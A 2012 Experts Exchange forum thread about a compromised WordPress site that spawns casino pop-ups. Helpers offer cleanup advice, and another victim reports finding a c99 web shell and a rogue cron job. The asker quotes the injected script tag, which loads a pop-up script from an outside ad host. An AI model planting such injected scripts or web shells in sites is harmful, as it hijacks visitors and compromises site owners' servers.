Expiring Today—Celebrate National IT Professionals Day with 3 months of free Premium Membership. Use Code ITDAY17

x
?
Solved

wordpress web site plagued with pop ups

Posted on 2012-03-11
10
Medium Priority
?
542 Views
Last Modified: 2012-03-16
Hello

I have a web site hosted on www.1&1.co.uk using wordpress but recently have noticed when i go to the site it is plagued with casino page pop up advertisements.

you go to the site and 4 other pages open up for casino games.

is this a problem with the site on wordpress or with the domain name hosted with 1&1?

desperately need some help with this issue

thank you
0
Comment
Question by:drzackzuss
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 4
  • 3
  • 2
  • +1
10 Comments
 
LVL 8

Expert Comment

by:2toria
ID: 37707384
Hi there.

I'm not entirely sure what the problem might be without having a look at your website.  Are you able to post a link?

Have you any Wordpress plugins installed on your site?  If so can you list them?  It might be possible one of them is causing this issue.

Matt
0
 

Author Comment

by:drzackzuss
ID: 37708776
hello

yes there are three plug ins installed

add logo to admin
formidable
options framework



also i have gone onto the web site using firefox and used the "view page source" option and have found these lines of code at the very bottom

</body>
</html><script language="javascript" src="http://www.777seo.com/pop.php?username=empixcrew&max=5"></script>
<noscript><a href="http://www.paid-to-promote.net/" target="_blank">Paid To Popup</a></noscript>

i imagine this is def what is causing the problem but not sure how i can go about removing it.



thank you for any more help
0
 
LVL 83

Accepted Solution

by:
David Johnson, CD, MVP earned 1332 total points
ID: 37709062
Your site has been compromised. if you are using v3.2.1 of wordpress you should update it to the latest stable version and go through your site checking your code

You might want to take a look at this http://pastebin.com/JzQvZvyT this hacking crew is very busy..

You might also want to look at this site http://community.websense.com/blogs/securitylabs/archive/2012/01/30/3_2D00_2_2D00_1-wordpress-vulnerability-leads-to-possible-new-exploit-kit.aspx which shows what to look for in your code.
0
Survive A High-Traffic Event with Percona

Your application or website rely on your database to deliver information about products and services to your customers. You can’t afford to have your database lose performance, lose availability or become unresponsive – even for just a few minutes.

 

Author Comment

by:drzackzuss
ID: 37711327
hello

thank you or your help

just to explain i have access to edit the wordpress site but do not have access to the domain.

the code does not appear at all when looking through every file on wordpress but as said is clearly on the html for the site.

would this be a case of contacting the guy who hosts the site and asking him to log on to the domain host and delete the offending code?

will it just be the same HTML code on the web page source but hosted on a server?  is it a simple job to edit it out?
0
 
LVL 83

Expert Comment

by:David Johnson, CD, MVP
ID: 37711680
just to explain i have access to edit the wordpress site but do not have access to the domain

When you say you have access to edit but not access to the domain does this mean that you can access the site through the wordpress editor but not directly access the site itself?  i.e. you do not have direct ftp/webdav access to the site?

You need to be able to go through every source file on the site. and every plugin and all of the script files.  If you have a backup of the site, then restoring from a backup is probably quicker.
0
 
LVL 1

Assisted Solution

by:Beyond_Hideki
Beyond_Hideki earned 668 total points
ID: 37724661
I am in the same situation as the OP. Thanks to google I had found this posting. I now upgraded my WP version to the latest which was 3.3.1 let's see if that's the issue.

I thought I was just "shelled" and they does manual editing of my files so they could inject that certain code. At first, I thought it was a timthumb exploit, but since it happened again to me (which what brought me here), so its not from there, I cannot find shells anymore in my files.

for others' sake, try checking out your wp-blog-header.php file. I saw the code there.
0
 
LVL 83

Assisted Solution

by:David Johnson, CD, MVP
David Johnson, CD, MVP earned 1332 total points
ID: 37727590
You're not alone.. hundreds of wordpress sites have been compromised this way daily
0
 

Author Comment

by:drzackzuss
ID: 37728650
hello

thank you for your help

I managed to get in contact with the guy who currently hosts the site and he has helped remove the code.

he seems to think it was a virus in a picture that was uploaded but i think that he is just trying to cover his back as he is supposed to keep it all up to date.

anyway removing the code and updating wordpress to the latest version has stop the pop up ads.
0
 
LVL 83

Expert Comment

by:David Johnson, CD, MVP
ID: 37728731
It wasn't the picture it was a vulnerability in WordPress.. Twit.tv also got hit with the same problem.Check this page as this is still going on.
0
 
LVL 1

Expert Comment

by:Beyond_Hideki
ID: 37729339
I checked my site again today, but unfortunately, the script still gets injected, even though I had upgraded to the latest version of WP.

I then decided to check again my file manager, and examine the wordpress files. You can also do so by using this link http://codex.wordpress.org/WordPress_Files as reference.

I noticed 2 files which are not really WP files. Namely:

wp-ok.php
wp-link.php

at first, I didnt think that these were such malicious php files. checking whats inside those are:
on wp-ok.php its a c99 shell.
on wp-link.php its an obfuscated php file that when loaded, a password protected page will show. just like the image attached.

wp-link.php when accessed directly.
I also found out an unwanted Cron job happening on my server. it has a name of OneHeart.bot.chk --deleted that job too coz it had eaten up a lot of my hosting account's resources.

I am on the process of locating and removing all the possible malicious files or shells in my file manager. Though, the entry point of this exploit is still unclear to me.
0

Featured Post

Basic Security of Your VPC

So, you’ve got this shiny new VPC and a fancy new application configured on your EC2 servers ready to go. This application is only accessible from your computer, which is great for security, but you need your users to be able to access it! So, what’s the easiest way to do this?

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Color can increase conversions, create feelings of warmth or even incite people to get behind a cause. If you want your website to really impact site visitors, then it is vital to consider the impact color has on them.
When it comes to security, close monitoring is a must. According to WhiteHat Security annual report, a substantial number of all web applications are vulnerable always. Monitis offers a new product - fully-featured Website security monitoring and pr…
Viewers will get an overview of the benefits and risks of using Bitcoin to accept payments. What Bitcoin is: Legality: Risks: Benefits: Which businesses are best suited?: Other things you should know: How to get started:
The viewer will learn how to dynamically set the form action using jQuery.
Suggested Courses

719 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question